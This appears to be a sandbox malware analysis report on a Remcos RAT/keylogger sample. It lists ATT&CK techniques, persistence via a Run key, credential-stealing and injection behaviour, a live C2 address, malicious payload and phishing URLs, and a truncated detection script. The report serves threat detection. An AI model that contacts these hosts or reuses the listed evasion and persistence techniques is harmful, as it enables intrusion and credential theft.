Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 61 Virtualization/Sandbox Evasion | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 322 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph (ID: 1584203, Sample: 4XYAW8PbZH.exe, Startdate: 04/01/2025, Architecture: WINDOWS, Score: 100)

Start node: contacts www.google.com, mdec.nelreports.net, geoplugin.net; signatures: Suricata IDS alerts for network traffic, Found malware configuration, Malicious sample detected (through community Yara rule), 12 other signatures.
4XYAW8PbZH.exe (started): drops C:\Users\user\AppData\...\4XYAW8PbZH.exe.log (ASCII); signatures: Contains functionality to bypass UAC (CMSTPLUA), Contains functionality to change the wallpaper, Contains functionality to steal Chrome passwords or cookies, 5 other signatures; starts 4XYAW8PbZH.exe, powershell.exe, WerFault.exe.
4XYAW8PbZH.exe (child): drops C:\Users\user\AppData\Roaming\...\graias.exe (PE32) and C:\Users\user\...\graias.exe:Zone.Identifier (ASCII); signatures: Detected Remcos RAT, Creates autostart registry keys with suspicious names; starts graias.exe.
powershell.exe: Loading BitLocker PowerShell Module; starts conhost.exe. WerFault.exe: drops C:\ProgramData\Microsoft\...\Report.wer (Unicode).
graias.exe: signatures: Multi AV Scanner detection for dropped file, Machine Learning detection for dropped file, Adds a directory exclusion to Windows Defender, Injects a PE file into a foreign processes; starts graias.exe, powershell.exe (Loading BitLocker PowerShell Module; starts conhost.exe, WmiPrvSE.exe), WerFault.exe.
graias.exe (child): contacts 185.234.72.215 (ports 4444, 49734; COMBAHTONcombahtonGmbHDE, United Kingdom) and geoplugin.net 178.237.33.50 (ports 49737, 80; ATOM86-ASATOM86NL, Netherlands); drops C:\ProgramData\graias\logs.dat (data); signatures: Detected Remcos RAT, Writes to foreign memory regions, Maps a DLL or memory area into another process, Installs a global keyboard hook; starts svchost.exe (3) and 23 other processes.
svchost.exe processes start chrome.exe processes (8 shown plus 42 others), which in turn start further chrome.exe processes (8 shown plus 41 others); contacted endpoints: 192.168.2.4 (ports 138, 443, 4444), 239.255.255.250 (Reserved), s-part-0032.t-0009.t-msedge.net 13.107.246.60 (ports 443, 50605, 50623; MICROSOFT-CORP-MSN-AS-BLOCKUS, United States), 142.250.186.164 (ports 443, 50477, 50584; GOOGLEUS, United States), 11 other IPs or domains.

Source | Detection | Scanner | Label
4XYAW8PbZH.exe | 60% | Virustotal |
4XYAW8PbZH.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.SnakeKeylogger
4XYAW8PbZH.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Graias\graias.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Graias\graias.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.SnakeKeylogger

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725 | 0% | Avira URL Cloud | safe
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
www.google.com | 142.250.186.68 | true | false | | high
s-part-0039.t-0009.t-msedge.net | 13.107.246.67 | true | false | | high
s-part-0032.t-0009.t-msedge.net | 13.107.246.60 | true | false | | high
js.monitor.azure.com | unknown | unknown | false | | high
mdec.nelreports.net | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js | false | | high
http://geoplugin.net/json.gp | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf | chromecache_283.17.dr | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designersG | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/ | chromecache_283.17.dr | false | | high
https://www.linkedin.com/cws/share?url=$ | chromecache_316.17.dr, chromecache_296.17.dr | false | | high
http://geoplugin.net/json.gp2 | graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.tiro.com | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Youssef1313 | chromecache_283.17.dr | false | | high
https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0 | chromecache_316.17.dr, chromecache_296.17.dr | false | | high
https://aka.ms/msignite_docs_banner | chromecache_316.17.dr, chromecache_296.17.dr | false | | high
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9 | chromecache_296.17.dr | false | | high
http://polymer.github.io/AUTHORS.txt | chromecache_316.17.dr, chromecache_296.17.dr | false | | high
https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml | chromecache_283.17.dr | false | | high
http://www.sajatypeworks.com | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.typography.netD | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/staff/dennis.htm | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://management.azure.com/subscriptions?api-version=2016-06-01 | chromecache_316.17.dr, chromecache_296.17.dr | false | | high
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md | chromecache_283.17.dr | false | | high
http://geoplugin.net/json.gp/C | 4XYAW8PbZH.exe, 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, 4XYAW8PbZH.exe, 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, 4XYAW8PbZH.exe, 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://aka.ms/pshelpmechoose | chromecache_316.17.dr, chromecache_296.17.dr | false | | high
https://aka.ms/feedback/report?space=61 | chromecache_283.17.dr | false | | high
http://www.galapagosdesign.com/DPlease | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://learn-video.azurefd.net/vod/player | chromecache_316.17.dr, chromecache_296.17.dr | false | | high
http://www.fonts.com | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://twitter.com/intent/tweet?original_referer=$ | chromecache_316.17.dr, chromecache_296.17.dr | false | | high
https://github.com/gewarren | chromecache_283.17.dr | false | | high
http://www.urwpp.deDPlease | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.zhongyicts.com.cn | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://polymer.github.io/CONTRIBUTORS.txt | chromecache_316.17.dr, chromecache_296.17.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 4XYAW8PbZH.exe, 00000000.00000002.1831640723.0000000002911000.00000004.00000800.00020000.00000000.sdmp, graias.exe, 00000008.00000002.1856673299.0000000002F0F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md | chromecache_283.17.dr | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725 | chromecache_283.17.dr | false | Avira URL Cloud: safe | unknown
https://client-api.arkoselabs.com/v2/api.js | chromecache_316.17.dr, chromecache_296.17.dr | false | | high
https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl | chromecache_316.17.dr, chromecache_296.17.dr | false | | high
https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev | chromecache_316.17.dr, chromecache_296.17.dr | false | | high
https://github.com/Thraka | chromecache_283.17.dr | false | | high
                                                                                                                        http://polymer.github.io/PATENTS.txtchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                          high
                                                                                                                          https://aka.ms/certhelpchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                            high
                                                                                                                            http://upx.sf.netAmcache.hve.7.drfalse
                                                                                                                              high
                                                                                                                              https://github.com/mairawchromecache_283.17.drfalse
                                                                                                                                high
                                                                                                                                https://schema.orgchromecache_296.17.drfalse
                                                                                                                                  high
                                                                                                                                  http://polymer.github.io/LICENSE.txtchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                                    high
                                                                                                                                    http://geoplugin.net/json.gpSystem32graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://aka.ms/yourcaliforniaprivacychoiceschromecache_283.17.drfalse
                                                                                                                                        high
                                                                                                                                        http://geoplugin.net/json.gp~graias.exe, 0000000B.00000002.4171327260.0000000000C80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://www.carterandcone.coml4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://github.com/nschonnichromecache_283.17.drfalse
                                                                                                                                              high
                                                                                                                                              http://www.fontbureau.com/designers/cabarga.htmlN4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.founder.com.cn/cn4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.fontbureau.com/designers/frere-user.html4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://github.com/adegeochromecache_283.17.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.jiyu-kobo.co.jp/4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://github.com/jonschlinkert/is-plain-objectchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://octokit.github.io/rest.js/#throttlingchromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.fontbureau.com/designers84XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://github.com/js-cookie/js-cookiechromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://schema.org/Organizationchromecache_283.17.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://channel9.msdn.com/chromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://github.com/dotnet/trychromecache_316.17.dr, chromecache_296.17.drfalse
                                                                                                                                                                        high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.186.68 | www.google.com | United States | 15169 | GOOGLEUS | false
13.107.246.60 | s-part-0032.t-0009.t-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
142.250.186.164 | unknown | United States | 15169 | GOOGLEUS | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
185.234.72.215 | unknown | United Kingdom | 30823 | COMBAHTONcombahtonGmbHDE | true

Private IP
192.168.2.4
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584203
Start date and time: 2025-01-04 18:41:03 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 14m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 144
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 4XYAW8PbZH.exe (renamed because the original name is a hash value)
Original Sample Name: 4A9440BAA61BE8363A372B0BBC5933AD.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@461/91@25/7
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 126
• Number of non-executed functions: 195
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 2.22.50.144, 192.229.221.95, 184.28.89.167, 142.250.186.174, 64.233.166.84, 216.58.206.35, 95.101.150.2, 142.250.185.78, 142.250.184.206, 142.250.185.206, 20.189.173.20, 142.250.74.202, 142.250.186.138, 142.250.186.106, 142.250.186.74, 172.217.16.138, 142.250.185.170, 142.250.185.138, 216.58.206.42, 172.217.18.10, 142.250.185.106, 142.250.184.202, 142.250.186.170, 142.250.181.234, 142.250.186.42, 142.250.185.202, 142.250.185.234, 104.208.16.88, 2.16.168.102, 2.16.168.100, 13.74.129.1, 13.89.179.8, 13.107.21.237, 204.79.197.237, 142.250.181.238, 172.217.18.14, 142.250.185.142, 172.217.23.110, 142.250.186.67, 142.250.185.238, 23.56.254.14, 51.104.15.253, 20.42.65.84, 184.30.230.100, 172.217.16.206, 142.250.185.174, 52.168.112.66, 216.58.206.78, 51.104.15.252, 13.69.116.107, 104.208.16.95, 142.250.185.74, 216.58.212.170, 172.217.16.202, 142.250.184.234, 216.58.212.138, 216.58.206.74, 20.190.160.17, 23.56.254.164, 13.107.246.67, 13.107.246.45, 20.109.210.53
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, onedscolprdcus20.centralus.cloudapp.azure.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, onedscolprdweu09.westeurope.cloudapp.azure.com, update.googleapis.com, onedscolprdeus02.eastus.cloudapp.azure.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, onedscolprduks04.uksouth.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, onedscolprdeus01.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, onedscolprdcus08.centralus.cloudapp.az
• Execution Graph export aborted for target graias.exe, PID 7328 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
12:41:51 | API Interceptor | 1x Sleep call for process: 4XYAW8PbZH.exe modified
12:41:53 | API Interceptor | 43x Sleep call for process: powershell.exe modified
12:41:54 | API Interceptor | 2072771x Sleep call for process: graias.exe modified
12:42:09 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
17:41:57 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-O844B9 "C:\Users\user\AppData\Roaming\Graias\graias.exe"
17:42:05 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-O844B9 "C:\Users\user\AppData\Roaming\Graias\graias.exe"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
239.255.255.250
  phishingemail.eml | malicious | Unknown | -
  phishingtest.eml | malicious | Unknown | -
  http://livedashboardkit.info | malicious | Unknown | -
  iGhDjzEiDU.exe | malicious | Remcos | -
  random.exe | malicious | Unknown | -
  random.exe | malicious | Unknown | -
  1735939565593f5d6bf694464eb338b020a826ec212acacc46d4424bb914edbae3d507116e469.dat-decoded.exe | malicious | LiteHTTP Bot | -
  https://track2.mccarthysearch.com/9155296/c?p=UJEwZLRSuPVlnD1ICTWZusB5H46ZFxhQFeZmgv_N89FzkqdhuHSGoPyB5qZfahmny00oVnRJ_XGR4M89Ovy-j3JZN_nz1Nb-BfHfDXVFwrd4A8njKtxWHgVV9KpuZ3ad6Xn31h13Ok4dSqgAUkhmVH1KUMKOlrKi5AYGmafMXkrBRxU_B4vy7NXVbEVJ970TwM25LbuS_B0xuuC5g8ehQDyYNyEV1WCghuhx_ZKmrGeOOXDf8HkQ-KOwv_tecp8TMdskXzay5lvoS31gB-nWxsjPaZ8f84KWvabQB4eF73ffpyNcTpJues_4IHHPjEKJ9ritMRTaHbFdQGNT_n13X_E7no0nMmaegQjwo4kKGu6oR02iG2c_6ucy3I6d8vsNl324Pjhx3M20dDmfZAju1roW9lGyO1LfgEnp1iSAFpx4kA7frEmKGzJYNX_cZrwVBoH8vvIYauXGnXBrZacRhuZGGbOjW2HHr9KF-0q7xjdgG2hxjWZ2H9zjubJGDnUjHRfiIr_-0bem1pLFqziEmy0450LGuXV23cQ6GD8yuK9tuRwMIF0sbkhVqONC0e6TsXlkUuTRAVWBbLlRPcygJ-CbukwvFtAxobVQ8-PpIuGj97DYFnmbfbJrrZDtH57TpdP4AxtW5k74BKSXvb1B6JX0p7Oyr1kXxLs_OrNPdAdrf8gXR35D9W7WeQ2zhPEqP0Mv5sJx4DlYh6Y4FqgPfCRFcDcL7Cy3HSlJ0XYfv-ae4o-hdX_0rJPqEG_-Bn2yj60YPDYpE8KDIgC_ZMwlNLdK4pAK6vSt4NWDncuV5y7QDqt97ribjd4U3AOvQTKW9r_eMky9-IC9hkSPrg2S0ZBgA9ITW3AQ3v-lq94cAwt1v1RLaFgsy67l_7lni1gYsZaQdOsFJsDpCFYaZsTMcVz2QAnQ_2UidhzlUekPl5xh9LNe9o77rO1FolZslooaXxCf2U2RZmvUA6NCNiGZ8KSsoUYTnqAHenvBJVJwMWd66yD2O60rC3Ic2qOQ1KOF9AB6-iFTvQFxtSTjS2hFwi7N97LeQtVYKhdzZuq2SasgJg0JPnZiFv_FSbgmiodqx9rz_lWIqWQNoQVht-oO2BfFxSF_aedAmm2MuQAL7z8UjBf_deiKwQyfKOyA6ZkAJ14F9xwhNm9F7B4PBgDtocqJQBjw5Cf1jCBSAs3nSYP2_nzofJuQSXd-YD9PIzkkmJw7Nqux7IgJ6p1z2Hsf6i3zShVdZY3g2mmA1xR1FV1LoSYwcRBqZt3pv0UDjuqCEoiqKDuyT0rkhqTRLo29uuM588Lna16PFSgSLoLUhnJ2rx8NLQQc5TqrsGjlN-ulCwTEyA0C9Epz9mxq14yDjw== | malicious | Unknown | -
  https://covid19.protected-forms.com/XQTNkY0hwMkttOEdiZmZ0V2RRTHpDdDNqUTROanhES0NBYmdFOG1KTGRSTUtrK3VMMzlEN1JKVVFXNUxaNGJOQmd1YzQ3ajJMeVdZUDU3TytRbGtIaFhWRkxnT0lkeTZhdy9xWEhjeFBoRXRTb2hxdjlVbi9iSk1qZytLQ0JxRjd4UmpOS3VUQ2lpOEZneTRoVmpzY2dyekR1WlhYOWVteVcrUXg0a2Y2aEU2ZEZwMVNId3R0U01RK3N3PT0tLVR0bDl1WEFUelg3K2VzTystLUxaMkFrZnU0UmJXRkR3aE5NRE9BOEE9PQ==?cid=2351432832 | malicious | KnowBe4 | -
  https://www.copiat.ro/6.exe | malicious | Unknown | -
178.237.33.50
  iGhDjzEiDU.exe | malicious | Remcos | geoplugin.net/json.gp
  1.exe | malicious | Remcos | geoplugin.net/json.gp
  Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe | malicious | Remcos | geoplugin.net/json.gp
  heteronymous.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
  2LDJIyMl2r.exe | malicious | Remcos | geoplugin.net/json.gp
  1evAkYZpwDV0N4v.exe | malicious | Remcos | geoplugin.net/json.gp
  94e.exe | malicious | Remcos | geoplugin.net/json.gp
  94e.exe | malicious | Remcos | geoplugin.net/json.gp
  0442.pdf.exe | malicious | Remcos | geoplugin.net/json.gp
  1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
13.107.246.60
  https://protect-us.mimecast.com/s/wFHoCqxrAnt7V914iZaD1v | malicious | Unknown | www.mimecast.com/Customers/Support/Contact-support/
  http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5 | malicious | Unknown | wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0017.t-0009.t-msedge.net
  GpuXmm386e.msi | malicious | Unknown | 13.107.246.45
  yKkpG6xM4S.msi | malicious | Unknown | 13.107.246.45
  IlPF8gbvGl.msi | malicious | Unknown | 13.107.246.45
  iGhDjzEiDU.exe | malicious | Remcos | 13.107.246.45
  random.exe | malicious | Unknown | 13.107.246.45
  3lhrJ4X.exe | malicious | LiteHTTP Bot | 13.107.246.45
  1735939565593f5d6bf694464eb338b020a826ec212acacc46d4424bb914edbae3d507116e469.dat-decoded.exe | malicious | LiteHTTP Bot | 13.107.246.45
  http://www.cipassoitalia.it/ | malicious | CAPTCHA Scam ClickFix | 13.107.246.45
  https://rfqdocu.construction-org.com/Q5kL4/ | malicious | HTMLPhisher | 13.107.246.45
  https://www.earthsatellitemaps.co/esmrel/landing.php?uid=0&lid=0&sid=531485973&sid2=1361197931118060&sid3=&sid4=google%20maps%20pro&sid5=&sid6=&sid7=&sid8=&rid=&_agid=0&aid=0&r=657&_agid=73407&msclkid=8b3e7b2e92fe1f072cfc1c5c7ae3c44d | malicious | Unknown | 13.107.246.45
s-part-0039.t-0009.t-msedge.net
  iGhDjzEiDU.exe | malicious | Remcos | 13.107.246.67
  http://knoxoms.com | malicious | Unknown | 13.107.246.67
  file.exe | malicious | LummaC | 13.107.246.67
  file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 13.107.246.67
  file.exe | malicious | LummaC | 13.107.246.67
  file.exe | malicious | LummaC | 13.107.246.67
  file.exe | malicious | LummaC | 13.107.246.67
  file.exe | malicious | LummaC | 13.107.246.67
  file.exe | malicious | LummaC | 13.107.246.67
  file.exe | malicious | LummaC | 13.107.246.67
s-part-0032.t-0009.t-msedge.net
  https://share.hsforms.com/1ERkb7-8BRoi6cEFhMJVsvgt08ok | malicious | HTMLPhisher | 13.107.246.60
  TieLoader.exe | malicious | Unknown | 13.107.246.60
  mmi8nLybam.exe | malicious | LodaRAT | 13.107.246.60
  file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 13.107.246.60
  file.exe | malicious | LummaC | 13.107.246.60
  +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg | malicious | HtmlDropper | 13.107.246.60
  file.exe | malicious | LummaC | 13.107.246.60
  file.exe | malicious | LummaC | 13.107.246.60
  file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 13.107.246.60
  file.exe | malicious | LummaC | 13.107.246.60
geoplugin.net
  iGhDjzEiDU.exe | malicious | Remcos | 178.237.33.50
  1.exe | malicious | Remcos | 178.237.33.50
  Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe | malicious | Remcos | 178.237.33.50
  heteronymous.vbs | malicious | Remcos, GuLoader | 178.237.33.50
  2LDJIyMl2r.exe | malicious | Remcos | 178.237.33.50
  1evAkYZpwDV0N4v.exe | malicious | Remcos | 178.237.33.50
  94e.exe | malicious | Remcos | 178.237.33.50
  94e.exe | malicious | Remcos | 178.237.33.50
  0442.pdf.exe | malicious | Remcos | 178.237.33.50
  1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exe | malicious | Remcos | 178.237.33.50
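Two indicators from this report are worth turning into a repeatable check: the autostart entry (a Run value named Rmc-O844B9 whose data points at an executable dropped under %AppData%\Roaming) and the geoplugin.net/json.gp lookup shared by every Remcos sample correlated on 178.237.33.50 and geoplugin.net. The script below is an added example, not part of the Joe Sandbox report or of any vendor tool: it scans a constructed Run-key export and constructed proxy-log lines for those indicators. The record layouts, the client IPs and the treatment of "Rmc-" plus a short alphanumeric tail as the value-name pattern are assumptions made for illustration, generalised from the single Rmc-O844B9 instance on this page.

```python
import re
from dataclasses import dataclass

# Constructed sample data (not taken from the report's own logs).
# Run-key export in "reg query"-style layout: name  type  data, separated by runs of spaces.
RUN_KEY_EXPORT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Rmc-O844B9    REG_SZ    "C:\Users\user\AppData\Roaming\Graias\graias.exe"
    SecurityHealth    REG_SZ    C:\Program Files\Windows Defender\MSASCuiL.exe
"""

# Constructed proxy log: client_ip method url status
PROXY_LOG = """
10.0.0.15 GET http://geoplugin.net/json.gp 200
10.0.0.15 GET https://www.mimecast.com/Customers/Support/Contact-support/ 200
10.0.0.22 GET http://geoplugin.net/json.gp 200
10.0.0.31 GET https://example.org/index.html 200
"""

# Assumed generalisation of the value name seen in this report (Rmc-O844B9).
RMC_VALUE_NAME = re.compile(r"^Rmc-[0-9A-Za-z]{4,8}$")
# Autostart data pointing into the roaming profile, as graias.exe does here.
ROAMING_PATH = re.compile(r"\\AppData\\Roaming\\", re.IGNORECASE)
GEOPLUGIN_ENDPOINT = "geoplugin.net/json.gp"


@dataclass(frozen=True)
class Finding:
    source: str      # "run_key" or "proxy"
    indicator: str   # which rule fired
    detail: str      # the matching record


def parse_run_entries(export):
    """Return (name, data) pairs for each REG_SZ value line of the export."""
    entries = []
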